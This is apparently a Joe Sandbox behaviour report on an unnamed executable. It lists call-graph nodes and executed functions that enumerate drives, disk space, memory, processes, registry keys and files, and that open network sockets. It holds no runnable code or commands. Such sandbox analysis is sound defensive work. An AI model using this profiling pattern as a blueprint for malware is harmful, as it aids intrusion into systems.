GetLogicalDrives 86630->86632 86632->86631 86635 7250355 86633->86635 86637 72500db 86636->86637 86638 725011d GetLogicalDrives 86637->86638 86639 725010c 86638->86639 86640 7250123 86639->86640 86643 725017c GetLogicalDrives 86639->86643 86641 725012d 86640->86641 86642 725013b GetLogicalDrives 86640->86642 86642->86641 86645 7250355 86643->86645 86647 7250237 GetLogicalDrives 86646->86647 86649 7250355 86647->86649 86651 7250114 GetLogicalDrives 86650->86651 86653 7250355 86651->86653 86655 7250237 GetLogicalDrives 86654->86655 86657 7250355 86655->86657 86659 7250215 GetLogicalDrives 86658->86659 86661 7250355 86659->86661 86663 7250152 GetLogicalDrives 86662->86663 86665 7250355 86663->86665 86667 725032a GetLogicalDrives 86666->86667 86669 7250355 86667->86669 86671 72502dc GetLogicalDrives 86670->86671 86673 7250355 86671->86673 86675 725014e GetLogicalDrives 86674->86675 86677 7250355 86675->86677 86679 725014e GetLogicalDrives 86678->86679 86681 7250355 86679->86681 86683 7250092 86682->86683 86684 725011d GetLogicalDrives 86683->86684 86685 725010c 86684->86685 86686 7250123 86685->86686 86689 725017c GetLogicalDrives 86685->86689 86687 725012d 86686->86687 86688 725013b GetLogicalDrives 86686->86688 86688->86687 86691 7250355 86689->86691 86693 725020e GetLogicalDrives 86692->86693 86695 7250355 86693->86695 86697 72500db 86696->86697 86698 725011d GetLogicalDrives 86697->86698 86699 725010c 86698->86699 86700 7250123 86699->86700 86703 725017c GetLogicalDrives 86699->86703 86701 725012d 86700->86701 86702 725013b GetLogicalDrives 86700->86702 86702->86701 86705 7250355 86703->86705 86707 725013b GetLogicalDrives 86706->86707 86708 725012d 86707->86708 86854 54d5e0 86855 54d652 WSAStartup 86854->86855 86856 54d5f0 86854->86856 86855->86856 86709 56b400 86710 56b425 86709->86710 86711 56b40b 86709->86711 86714 537770 86711->86714 86712 56b421 86715 537790 86714->86715 86716 5377b6 recv 86714->86716 86715->86716 86717 537799 86715->86717 86716->86717 86717->86712 86718 56e400 86719 56e412 86718->86719 86720 56e459 86718->86720 86722 5668b0 socket ioctlsocket connect getsockname closesocket 86719->86722 86722->86720 86723 56b3c0 86724 56b3ee 86723->86724 86725 56b3cb 86723->86725 86727 5376a0 send 86725->86727 86729 569290 86725->86729 86726 56b3ea 86727->86726 86730 5376a0 send 86729->86730 86731 5692e5 86730->86731 86732 569335 WSAIoctl 86731->86732 86734 569392 86731->86734 86733 569366 86732->86733 86732->86734 86733->86734 86735 569371 setsockopt 86733->86735 86734->86726 86735->86734 86736 7290471 86737 7290477 Process32FirstW 86736->86737 86738 7290492 86737->86738 86739 5e3c00 86740 5e3c23 86739->86740 86742 5e3c0d 86739->86742 86740->86742 86743 5fb180 86740->86743 86749 5fb19b 86743->86749 86750 5fb2e3 86743->86750 86746 5fb2a9 getsockname 86760 5fb020 86746->86760 86748 5fb020 closesocket 86748->86749 86749->86746 86749->86748 86749->86750 86751 5faf30 86749->86751 86755 5fb060 86749->86755 86750->86742 86752 5faf4c 86751->86752 86753 5faf63 socket 86751->86753 86752->86753 86754 5faf52 86752->86754 86753->86749 86754->86749 86757 5fb080 86755->86757 86756 5fb0b0 connect 86758 5fb0bf WSAGetLastError 86756->86758 86757->86756 86757->86758 86759 5fb0ea 86757->86759 86758->86757 86758->86759 86759->86749 86761 5fb029 86760->86761 86762 5fb052 86760->86762 86763 5fb04b closesocket 86761->86763 86764 5fb03e 86761->86764 86762->86749 86763->86762 86764->86749 86857 5e4720 86858 5e4728 86857->86858 86859 5e4733 86858->86859 86860 5e477d 86858->86860 86869 5e476c 86858->86869 86870 5e5540 socket ioctlsocket connect getsockname closesocket 86858->86870 86862 5e4774 86864 5e482e 86864->86869 86871 5e9270 86864->86871 86866 5e4860 86876 5e4950 86866->86876 86868 5e4878 86869->86868 86884 5e30a0 socket ioctlsocket connect getsockname closesocket 86869->86884 86870->86864 86885 5ea440 86871->86885 86873 5e9297 86875 5e92ab 86873->86875 86915 5ebbe0 socket ioctlsocket connect getsockname closesocket 86873->86915 86875->86866 86877 5e4966 86876->86877 86881 5e49c5 86877->86881 86883 5e49b9 86877->86883 86917 5eb590 if_nametoindex if_indextoname 86877->86917 86879 5e4aa0 gethostname 86879->86881 86879->86883 86880 5e4a3e 86880->86881 86918 5ebbe0 socket ioctlsocket connect getsockname closesocket 86880->86918 86881->86869 86883->86879 86883->86881 86884->86862 86908 5ea46b 86885->86908 86886 5ea4db 86887 5eaa03 RegOpenKeyExA 86886->86887 86903 5ead14 86886->86903 86888 5eaa27 RegQueryValueExA 86887->86888 86889 5eab70 RegOpenKeyExA 86887->86889 86890 5eaacc RegQueryValueExA 86888->86890 86891 5eaa71 86888->86891 86892 5eac34 RegOpenKeyExA 86889->86892 86913 5eab90 86889->86913 86895 5eab0e 86890->86895 86896 5eab66 RegCloseKey 86890->86896 86891->86890 86898 5eaa85 RegQueryValueExA 86891->86898 86893 5eacf8 RegOpenKeyExA 86892->86893 86894 5eac54 86892->86894 86897 5ead56 RegEnumKeyExA 86893->86897 86893->86903 86894->86893 86895->86896 86902 5eab1e RegQueryValueExA 86895->86902 86896->86889 86899 5ead9b 86897->86899 86897->86903 86901 5eaab3 86898->86901 86900 5eae16 RegOpenKeyExA 86899->86900 86904 5eaddf RegEnumKeyExA 86900->86904 86905 5eae34 RegQueryValueExA 86900->86905 86901->86890 86909 5eab4c 86902->86909 86903->86873 86904->86900 86904->86903 86906 5eaf43 RegQueryValueExA 86905->86906 86914 5eadaa 86905->86914 86907 5eb052 RegQueryValueExA 86906->86907 86906->86914 86910 5eadc7 RegCloseKey 86907->86910 86907->86914 86908->86886 86916 5eb830 if_nametoindex if_indextoname 86908->86916 86909->86896 86910->86904 86912 5eafa0 RegQueryValueExA 86912->86914 86913->86892 86914->86906 86914->86907 86914->86910 86914->86912 86915->86875 86916->86886 86917->86880 86918->86883 86765 5fa080 86768 5f9740 86765->86768 86767 5fa09b 86769 5f9780 86768->86769 86773 5f975d 86768->86773 86770 5f9925 RegOpenKeyExA 86769->86770 86769->86773 86771 5f995a RegQueryValueExA 86770->86771 86770->86773 86772 5f9986 RegCloseKey 86771->86772 86772->86773 86773->86767

                                                  Executed Functions

                                                  Function 0056F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                  • API String ID: 0-1590685507
                                                  • Opcode ID: d436e1d7398bdf4f31a3e0145b557ed7bd8cc55ef1ad72b6fb5066814fbfe701
                                                  • Instruction ID: 4eda57c7b53bc89b89e2c4dcd5d89549f19a410a49115ea1cd2060fb9ee98626
                                                  • Opcode Fuzzy Hash: d436e1d7398bdf4f31a3e0145b557ed7bd8cc55ef1ad72b6fb5066814fbfe701
                                                  • Instruction Fuzzy Hash: BCC29F31A043459FD724CF28D485B6ABBE1BF84314F05CA6DEC999B2A2D771ED84CB81
                                                  Function 0053255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 861 53255d-532614 call 8b9f70 GetSystemInfo call 9b36f0 call 9b38e0 GlobalMemoryStatusEx call 9b36f0 call 9b38e0 943 532619 call 72500e5 861->943 944 532619 call 72501a7 861->944 945 532619 call 72502e3 861->945 946 532619 call 725022d 861->946 947 532619 call 725026c 861->947 948 532619 call 72502ac 861->948 949 532619 call 725016e 861->949 950 532619 call 7250328 861->950 951 532619 call 72500f4 861->951 952 532619 call 72501f1 861->952 953 532619 call 725033d 861->953 954 532619 call 725023d 861->954 955 532619 call 725007e 861->955 956 532619 call 72500b9 861->956 957 532619 call 725013b 861->957 958 532619 call 7250205 861->958 959 532619 call 7250145 861->959 960 532619 call 725018d 861->960 961 532619 call 725030c 861->961 962 532619 call 72502cb 861->962 963 532619 call 725020a 861->963 964 532619 call 725008a 861->964 965 532619 call 72500ca 861->965 966 532619 call 7250291 861->966 967 532619 call 72500d0 861->967 968 532619 call 7250393 861->968 969 532619 call 725021d 861->969 970 532619 call 725015d 861->970 971 532619 call 725009c 861->971 972 532619 call 72501de 861->972 872 53261b-532620 873 532626-532637 call 9b34f0 872->873 874 53277c-532904 call 9b36f0 call 9b38e0 KiUserCallbackDispatcher call 9b36f0 call 9b38e0 call 9b36f0 call 9b38e0 call 8b8e38 call 8b8be0 call 8b8bd0 FindFirstFileW 872->874 879 532754-53275c 873->879 921 532906-532926 FindNextFileW 874->921 922 532928-53292c 874->922 880 532762-532777 call 9b38e0 879->880 881 53263c-53264f GetDriveTypeA 879->881 880->874 885 532743-532751 call 8b8b98 881->885 886 532655-532685 GetDiskFreeSpaceExA 881->886 885->879 886->885 889 53268b-53273e call 9b37c0 call 9b3850 call 9b38e0 call 9b35e0 call 9b38e0 call 9b35e0 call 9b38e0 call 9b1c60 886->889 889->885 921->921 921->922 923 532932-53296f call 9b36f0 call 9b38e0 call 8b8e78 922->923 924 53292e 922->924 930 532974-532979 923->930 924->923 931 53297b-5329a4 call 9b36f0 call 9b38e0 930->931 932 5329a9-5329fe call 8ba290 call 9b36f0 call 9b38e0 930->932 931->932 943->872 944->872 945->872 946->872 947->872 948->872 949->872 950->872 951->872 952->872 953->872 954->872 955->872 956->872 957->872 958->872 959->872 960->872 961->872 962->872 963->872 964->872 965->872 966->872 967->872 968->872 969->872 970->872 971->872 972->872
                                                  APIs
                                                  • GetSystemInfo.KERNELBASE ref: 00532579
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 005325CC
                                                  • GetDriveTypeA.KERNELBASE ref: 00532647
                                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0053267E
                                                  • KiUserCallbackDispatcher.NTDLL ref: 005327E2
                                                  • FindFirstFileW.KERNELBASE ref: 005328F8
                                                  • FindNextFileW.KERNELBASE ref: 0053291F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                  • String ID: ;%S$@$`
                                                  • API String ID: 3271271169-799580559
                                                  • Opcode ID: 1cdd1b7cb7726aa16dac8340b81a5808cb9b17d71273c06573b4e4a1c3fa756c
                                                  • Instruction ID: 8c4d2ba2d4c296c54ec251adb997d44d62f0c0ffa221f332f5504ce474aba479
                                                  • Opcode Fuzzy Hash: 1cdd1b7cb7726aa16dac8340b81a5808cb9b17d71273c06573b4e4a1c3fa756c
                                                  • Instruction Fuzzy Hash: 2AD18EB49057199FCB10EF68C99569EBBF0FF88354F00896DE89897311E7349A84CF92
                                                  Function 005329FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1301 5329ff-532a2f FindFirstFileA 1302 532a31-532a36 1301->1302 1303 532a38 1301->1303 1304 532a3d-532a91 call 9b3850 call 9b38e0 RegOpenKeyExA 1302->1304 1303->1304 1309 532a93-532a98 1304->1309 1310 532a9a 1304->1310 1311 532a9f-532b0c call 9b3850 call 9b38e0 CharUpperA call 8b8da0 1309->1311 1310->1311 1319 532b15 1311->1319 1320 532b0e-532b13 1311->1320 1321 532b1a-532b92 call 9b3850 call 9b38e0 call 8b8e80 call 8b8e70 1319->1321 1320->1321 1330 532b94-532ba3 1321->1330 1331 532bcc-532c66 QueryFullProcessImageNameA CloseHandle call 8b8da0 1321->1331 1334 532bb0-532bca call 8b8e68 1330->1334 1335 532ba5-532bae 1330->1335 1341 532c68-532c6d 1331->1341 1342 532c6f 1331->1342 1334->1330 1334->1331 1335->1331 1343 532c74-532ce9 call 9b3850 call 9b38e0 call 8b8e80 call 8b8e70 1341->1343 1342->1343 1352 532dcf-532e1c call 9b3850 call 9b38e0 CloseHandle 1343->1352 1353 532cef-532d49 call 8b8bb0 call 8b8da0 1343->1353 1394 532e21 call 72e009c 1352->1394 1395 532e21 call 72e003b 1352->1395 1396 532e21 call 72e00eb 1352->1396 1397 532e21 call 72e0109 1352->1397 1398 532e21 call 72e00d6 1352->1398 1399 532e21 call 72e0007 1352->1399 1400 532e21 call 72e0024 1352->1400 1401 532e21 call 72e00a3 1352->1401 1402 532e21 call 72e0000 1352->1402 1403 532e21 call 72e0060 1352->1403 1364 532d4b-532d63 call 8b8da0 1353->1364 1365 532d99-532dad 1353->1365 1363 532e23-532e2e 1366 532e30-532e35 1363->1366 1367 532e37 1363->1367 1364->1365 1373 532d65-532d7d call 8b8da0 1364->1373 1365->1352 1369 532e3c-532ed6 call 9b3850 call 9b38e0 1366->1369 1367->1369 1382 532eea 1369->1382 1383 532ed8-532ee1 1369->1383 1373->1365 1379 532d7f-532d97 call 8b8da0 1373->1379 1379->1365 1387 532daf-532dc9 call 8b8e68 1379->1387 1386 532eef-532f16 call 9b3850 call 9b38e0 1382->1386 1383->1382 1385 532ee3-532ee8 1383->1385 1385->1386 1387->1352 1387->1353 1394->1363 1395->1363 1396->1363 1397->1363 1398->1363 1399->1363 1400->1363 1401->1363 1402->1363 1403->1363
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                  • String ID: 0
                                                  • API String ID: 2406880114-4108050209
                                                  • Opcode ID: 53bc78cce8fe72b0a8e4c7a3c129f75b89f61f9692518ba743b69582a5791b45
                                                  • Instruction ID: d8fd39c9c0dadb2828acc367c5cf49b05b90231a13272873230b56fc8b7faf59
                                                  • Opcode Fuzzy Hash: 53bc78cce8fe72b0a8e4c7a3c129f75b89f61f9692518ba743b69582a5791b45
                                                  • Instruction Fuzzy Hash: 5BE1C3B0905719DFCB10EF68D98569EBBF4BB44354F50886EE888DB350EB749A84CF42
                                                  Function 005405B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1550 5405b0-5405b7 1551 5405bd-5405d4 1550->1551 1552 5407ee 1550->1552 1553 5407e7-5407ed 1551->1553 1554 5405da-5405e6 1551->1554 1553->1552 1554->1553 1555 5405ec-5405f0 1554->1555 1556 5405f6-540620 call 547350 call 5370b0 1555->1556 1557 5407c7-5407cc 1555->1557 1562 540622-540624 1556->1562 1563 54066a-54068c call 56dec0 1556->1563 1557->1553 1564 540630-540655 call 5370d0 call 5403c0 call 547450 1562->1564 1569 5407d6-5407e3 call 547380 1563->1569 1570 540692-5406a0 1563->1570 1592 5407ce 1564->1592 1593 54065b-540668 call 5370e0 1564->1593 1569->1553 1571 5406f4-5406f6 1570->1571 1572 5406a2-5406a4 1570->1572 1577 5406fc-5406fe 1571->1577 1578 5407ef-54082b call 543000 1571->1578 1575 5406b0-5406e4 call 5473b0 1572->1575 1575->1569 1591 5406ea-5406ee 1575->1591 1582 54072c-540754 1577->1582 1589 540831-540837 1578->1589 1590 540a2f-540a35 1578->1590 1586 540756-54075b 1582->1586 1587 54075f-54078b 1582->1587 1594 540707-540719 WSAEventSelect 1586->1594 1595 54075d 1586->1595 1605 540700-540703 1587->1605 1606 540791-540796 1587->1606 1597 540861-54087e 1589->1597 1598 540839-54084c call 546fa0 1589->1598 1600 540a37-540a3a 1590->1600 1601 540a3c-540a52 1590->1601 1591->1575 1599 5406f0 1591->1599 1592->1569 1593->1563 1593->1564 1594->1569 1603 54071f 1594->1603 1604 540723-540726 1595->1604 1617 540882-54088d 1597->1617 1615 540852 1598->1615 1616 540a9c-540aa4 1598->1616 1599->1571 1600->1601 1601->1569 1608 540a58-540a81 call 542f10 1601->1608 1603->1604 1604->1578 1604->1582 1605->1594 1606->1605 1610 54079c-5407c2 call 5376a0 1606->1610 1608->1569 1623 540a87-540a97 call 546df0 1608->1623 1610->1605 1615->1597 1620 540854-54085f 1615->1620 1616->1569 1621 540970-540975 1617->1621 1622 540893-5408b1 1617->1622 1620->1617 1624 540a19-540a2c 1621->1624 1625 54097b-540989 call 5370b0 1621->1625 1626 5408c8-5408f7 1622->1626 1623->1569 1624->1590 1625->1624 1633 54098f-54099e 1625->1633 1634 5408fd-540925 1626->1634 1635 5408f9-5408fb 1626->1635 1637 5409b0-5409c1 call 5370d0 1633->1637 1636 540928-54093f 1634->1636 1635->1636 1643 540945-54096b 1636->1643 1644 5408b3-5408c2 1636->1644 1641 5409a0-5409ae call 5370e0 1637->1641 1642 5409c3-5409c7 1637->1642 1641->1624 1641->1637 1645 5409e8-540a03 WSAEnumNetworkEvents 1642->1645 1643->1644 1644->1621 1644->1626 1647 540a05-540a17 1645->1647 1648 5409d0-5409e6 WSAEventSelect 1645->1648 1647->1648 1648->1641 1648->1645
                                                  APIs
                                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00540712
                                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 005409DC
                                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005409FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: EventSelect$EnumEventsNetwork
                                                  • String ID: N=S$multi.c
                                                  • API String ID: 2170980988-3590082083
                                                  • Opcode ID: f94d9c6fe1394128e56a6b012764942da692e46a25e885ec29164aeda94b0a56
                                                  • Instruction ID: 5f56ef9819c945003aa57e9a02e13577c740970b949651021804ec67237402ca
                                                  • Opcode Fuzzy Hash: f94d9c6fe1394128e56a6b012764942da692e46a25e885ec29164aeda94b0a56
                                                  • Instruction Fuzzy Hash: BBD1D0716083069FE710CF60C985BAB7BE5FF94308F14582CFA8587292E774E955CB92
                                                  Function 005FB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1966 5fb180-5fb195 1967 5fb19b-5fb1a2 1966->1967 1968 5fb3e0-5fb3e7 1966->1968 1969 5fb1b0-5fb1b9 1967->1969 1969->1969 1970 5fb1bb-5fb1bd 1969->1970 1970->1968 1971 5fb1c3-5fb1d0 1970->1971 1973 5fb3db 1971->1973 1974 5fb1d6-5fb1f2 1971->1974 1973->1968 1975 5fb229-5fb22d 1974->1975 1976 5fb3e8-5fb417 1975->1976 1977 5fb233-5fb246 1975->1977 1984 5fb41d-5fb429 1976->1984 1985 5fb582-5fb589 1976->1985 1978 5fb248-5fb24b 1977->1978 1979 5fb260-5fb264 1977->1979 1980 5fb24d-5fb256 1978->1980 1981 5fb215-5fb223 1978->1981 1983 5fb269-5fb286 call 5faf30 1979->1983 1980->1983 1981->1975 1987 5fb315-5fb33c call 8b8b00 1981->1987 1994 5fb288-5fb2a3 call 5fb060 1983->1994 1995 5fb2f0-5fb301 1983->1995 1989 5fb42b-5fb433 call 5fb590 1984->1989 1990 5fb435-5fb44c call 5fb590 1984->1990 1997 5fb3bf-5fb3ca 1987->1997 1998 5fb342-5fb347 1987->1998 1989->1990 2005 5fb44e-5fb456 call 5fb590 1990->2005 2006 5fb458-5fb471 call 5fb590 1990->2006 2011 5fb2a9-5fb2c7 getsockname call 5fb020 1994->2011 2012 5fb200-5fb213 call 5fb020 1994->2012 1995->1981 2015 5fb307-5fb310 1995->2015 2007 5fb3cc-5fb3d9 1997->2007 2002 5fb349-5fb358 1998->2002 2003 5fb384-5fb38f 1998->2003 2009 5fb360-5fb382 2002->2009 2003->1997 2010 5fb391-5fb3a5 2003->2010 2005->2006 2024 5fb48c-5fb4a7 2006->2024 2025 5fb473-5fb487 2006->2025 2007->1968 2009->2003 2009->2009 2016 5fb3b0-5fb3bd 2010->2016 2022 5fb2cc-5fb2dd 2011->2022 2012->1981 2015->2007 2016->1997 2016->2016 2022->1981 2028 5fb2e3 2022->2028 2026 5fb4a9-5fb4b1 call 5fb660 2024->2026 2027 5fb4b3-5fb4cb call 5fb660 2024->2027 2025->1985 2026->2027 2033 5fb4cd-5fb4d5 call 5fb660 2027->2033 2034 5fb4d9-5fb4f5 call 5fb660 2027->2034 2028->2015 2033->2034 2039 5fb50d-5fb52b call 5fb770 * 2 2034->2039 2040 5fb4f7-5fb50b 2034->2040 2039->1985 2045 5fb52d-5fb531 2039->2045 2040->1985 2046 5fb533-5fb53b 2045->2046 2047 5fb580 2045->2047 2048 5fb53d-5fb547 2046->2048 2049 5fb578-5fb57e 2046->2049 2047->1985 2048->2049 2050 5fb549-5fb54d 2048->2050 2049->1985 2050->2049 2051 5fb54f-5fb558 2050->2051 2051->2049 2052 5fb55a-5fb576 call 5fb870 * 2 2051->2052 2052->1985 2052->2049
                                                  APIs
                                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 005FB2B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
